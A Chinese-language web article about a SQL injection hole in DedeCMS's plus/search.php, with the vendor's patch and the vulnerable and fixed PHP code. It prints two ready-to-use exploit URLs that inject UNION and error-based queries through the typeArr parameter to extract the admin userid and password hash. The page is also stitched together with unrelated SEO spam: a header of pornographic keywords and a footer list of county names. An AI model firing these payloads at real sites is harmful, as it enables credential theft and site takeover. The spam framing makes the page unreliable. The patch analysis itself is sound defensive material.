校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 網(wǎng)站建設(shè) > 建站知識 > dedecms plus/search.php注入漏洞修復(fù)及利用

dedecms plus/search.php注入漏洞修復(fù)及利用

POST TIME:2019-09-30 15:44

dedecms的最近出的一高危漏洞,search.php注入漏洞;估計(jì)現(xiàn)在很多黑闊都非常愛dedecms,因?yàn)榻?jīng)常有各種漏洞爆出.很多利用起來也都很簡單.

下面是漏洞的詳細(xì)利用細(xì)節(jié):

0×1:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 2 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`&;`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`&;`+]=a

0×2:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 1 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`&;`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)%23@`&;`+]=a

漏洞修復(fù):

20130115常規(guī)安全更新

include/arc.searchview.class.php, 搜索功能準(zhǔn)確度優(yōu)化
member/myfriend_group.php, 修復(fù)會員中心會員分組功能存在的安全隱患
plus/search.php, 修復(fù)搜索功能存在的安全隱患

登錄DEDECMS后臺會有提示,更新即可。不過貌似官方?jīng)]有提供安全更新補(bǔ)丁的下載地址,找了半天沒找到~

漏洞分析:

存在漏洞的文件/plus/search.php

//引入欄目緩存并看關(guān)鍵字是否有相關(guān)欄目內(nèi)容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword);

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; //對ID沒做任何過濾 導(dǎo)致注入

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

修復(fù)之后

//引入欄目緩存并看關(guān)鍵字是否有相關(guān)欄目內(nèi)容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

//$keywordn = str_replace($typename, ‘ ‘, $keyword);

$keywordn = $keyword;

if($keyword != $keywordn)

{

$keyword = HtmlReplace($keywordn);//防XSS

$typeid = intval($id); //強(qiáng)制轉(zhuǎn)換為數(shù)字型

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

 



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
主站蜘蛛池模板: 彭阳县| 嘉鱼县| 田阳县| 汶川县| 洛扎县| 菏泽市| 来凤县| 永顺县| 越西县| 延川县| 济源市| 汕尾市| 苗栗县| 法库县| 勃利县| 鲁山县| 如皋市| 玉屏| 蚌埠市| 中西区| 木兰县| 鄯善县| 广饶县| 察哈| 中阳县| 陆良县| 焉耆| 信宜市| 潼关县| 高邮市| 乐平市| 北川| 瓮安县| 关岭| 鄱阳县| 舒兰市| 梁平县| 丰县| 金阳县| 固阳县| 盐山县|